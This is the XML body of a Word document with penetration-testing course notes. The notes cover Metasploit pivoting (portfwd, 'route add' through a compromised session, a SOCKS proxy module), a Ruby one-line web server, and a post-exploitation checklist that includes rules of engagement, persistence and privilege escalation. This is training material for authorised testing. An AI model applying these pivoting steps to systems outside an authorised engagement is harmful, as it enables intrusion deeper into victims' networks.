    <w:p w14:paraId="2B2A6C62" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="158CB183" w14:textId="26BAA20A" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>PIVOTING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5182B41F" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E44F8AF" w14:textId="1FEE1410" w:rsidR="007B3D1E" w:rsidRPr="00D528BD" w:rsidRDefault="007B3D1E" w:rsidP="00D528BD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D528BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>inside meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570508DF" w14:textId="781B35C8" w:rsidR="007B3D1E" w:rsidRPr="00D528BD" w:rsidRDefault="007B3D1E" w:rsidP="00D528BD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D528BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Portfwd - forwards a port/</w:t>
      </w:r>
      <w:r w:rsidR="00D528BD" w:rsidRPr="00D528BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77322ECC" w14:textId="0E525B81" w:rsidR="007B3D1E" w:rsidRPr="00D528BD" w:rsidRDefault="007B3D1E" w:rsidP="00D528BD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D528BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">allows you to use tools outside of </w:t>
      </w:r>
      <w:r w:rsidR="00D528BD" w:rsidRPr="00D528BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3A3581" w14:textId="220C8CA0" w:rsidR="007B3D1E" w:rsidRPr="007F5232" w:rsidRDefault="007B3D1E" w:rsidP="007F5232">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5232">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Route - routes "MSF aware" traffic based on IP/Subnet through the respective </w:t>
      </w:r>
      <w:r w:rsidR="007F5232" w:rsidRPr="007F5232">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63237731" w14:textId="57F37D18" w:rsidR="007B3D1E" w:rsidRPr="007F5232" w:rsidRDefault="007B3D1E" w:rsidP="007F5232">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5232">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>msf&gt; route add [ip addr] [mask] [session #]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A09121" w14:textId="3C35CC59" w:rsidR="007B3D1E" w:rsidRPr="007F5232" w:rsidRDefault="007B3D1E" w:rsidP="007F5232">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5232">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">the more specific, that's the path it will </w:t>
      </w:r>
      <w:r w:rsidR="007F5232" w:rsidRPr="007F5232">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>take.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EC8245" w14:textId="743C639E" w:rsidR="007B3D1E" w:rsidRPr="007F5232" w:rsidRDefault="007B3D1E" w:rsidP="007F5232">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5232">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>msf&gt; route add 0.0.0.0 0.0.0.0 1 (routes everything)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404E5E65" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19880D8E" w14:textId="05E10492" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007F5232" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="007B3D1E" w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ocks proxy module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137CB14B" w14:textId="2E676284" w:rsidR="007B3D1E" w:rsidRPr="007F5232" w:rsidRDefault="007B3D1E" w:rsidP="007F5232">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5232">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>server that will listen and any traffic that goes in will come out as msf aware</w:t>
      </w:r>
      <w:r w:rsidR="007F5232">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AA4045" w14:textId="4EFCF7DC" w:rsidR="007B3D1E" w:rsidRPr="007F5232" w:rsidRDefault="007B3D1E" w:rsidP="007F5232">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5232">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>msf&gt; use auxillary/server/socks_proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B706F7B" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5371A869" w14:textId="7FD27BE3" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>RUBY CRASH COURSE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A569F2F" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78259C25" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>REPL (read eval print loop)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E441FC" w14:textId="1AFB8E81" w:rsidR="007B3D1E" w:rsidRPr="007F5232" w:rsidRDefault="007B3D1E" w:rsidP="007F5232">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5232">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>similar to python shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C434D8" w14:textId="4BF875CA" w:rsidR="007B3D1E" w:rsidRPr="007F5232" w:rsidRDefault="007B3D1E" w:rsidP="007F5232">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5232">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">enter code, see </w:t>
      </w:r>
      <w:r w:rsidR="007F5232" w:rsidRPr="007F5232">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722C0334" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D83DFB3" w14:textId="3EF40635" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007F5232" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="007B3D1E" w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ontrol z - backgrounds a shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6729889A" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F6A6D16" w14:textId="5CE91C30" w:rsidR="007B3D1E" w:rsidRPr="007F5232" w:rsidRDefault="007B3D1E" w:rsidP="007F5232">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5232">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ruby -run -ehttpd . -p 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E7C978" w14:textId="36A722B9" w:rsidR="007B3D1E" w:rsidRPr="007F5232" w:rsidRDefault="007B3D1E" w:rsidP="007F5232">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5232">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>make a web server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0728F0B1" w14:textId="4424A3C5" w:rsidR="007B3D1E" w:rsidRPr="007F5232" w:rsidRDefault="007B3D1E" w:rsidP="007F5232">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5232">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>. means share whatever directory you are in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A65F96" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31ADDA8E" w14:textId="114C9755" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>POST EXPLOITATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0749536D" w14:textId="77777777" w:rsidR="007F5232" w:rsidRDefault="007F5232" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="068B28EA" w14:textId="7F47F9DB" w:rsidR="007B3D1E" w:rsidRPr="007F5232" w:rsidRDefault="007B3D1E" w:rsidP="007F5232">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5232">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>-what is goal of engagement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AD50FB" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007F5232" w:rsidRDefault="007B3D1E" w:rsidP="007F5232">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5232">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>-what will this action do to further our goals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B087AF5" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007F5232" w:rsidRDefault="007B3D1E" w:rsidP="007F5232">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5232">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>-will this action cause outrage or damage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F61F7AD" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007F5232" w:rsidRDefault="007B3D1E" w:rsidP="007F5232">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5232">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>-is this action within the rules of engagement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C676631" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007F5232" w:rsidRDefault="007B3D1E" w:rsidP="007F5232">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5232">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>-what type of actors are we simulating (if any)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C81E12" w14:textId="70E9FF17" w:rsidR="007B3D1E" w:rsidRPr="007F5232" w:rsidRDefault="007B3D1E" w:rsidP="007F5232">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5232">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>-not really useful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19368231" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B2D49C5" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>4 P's</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7373FEB4" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007F5232" w:rsidRDefault="007B3D1E" w:rsidP="007F5232">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5232">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>-presence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FF2E0F" w14:textId="1443A0AA" w:rsidR="007B3D1E" w:rsidRPr="007F5232" w:rsidRDefault="007B3D1E" w:rsidP="007F5232">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5232">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>having presence of mind/shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F96DA3B" w14:textId="2FDC6F58" w:rsidR="007B3D1E" w:rsidRPr="007F5232" w:rsidRDefault="007B3D1E" w:rsidP="007F5232">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5232">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">looking around and making sure that what you are looking for isn't something you already </w:t>
      </w:r>
      <w:r w:rsidR="007F5232" w:rsidRPr="007F5232">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>have.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493EC8AC" w14:textId="3BB75F11" w:rsidR="007B3D1E" w:rsidRPr="007F5232" w:rsidRDefault="007B3D1E" w:rsidP="007F5232">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5232">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>-goals: find out what we have, current user context, what does the user do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A55404" w14:textId="172C0240" w:rsidR="007B3D1E" w:rsidRPr="007F5232" w:rsidRDefault="007B3D1E" w:rsidP="00A80F4F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5232">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>-detection occurs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4994D5A6" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007F5232" w:rsidRDefault="007B3D1E" w:rsidP="00A80F4F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5232">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>-persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD523FC" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007F5232" w:rsidRDefault="007B3D1E" w:rsidP="00A80F4F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5232">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>-pivoting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D25CDB" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007F5232" w:rsidRDefault="007B3D1E" w:rsidP="00A80F4F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5232">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>-privilege escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3540FD06" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
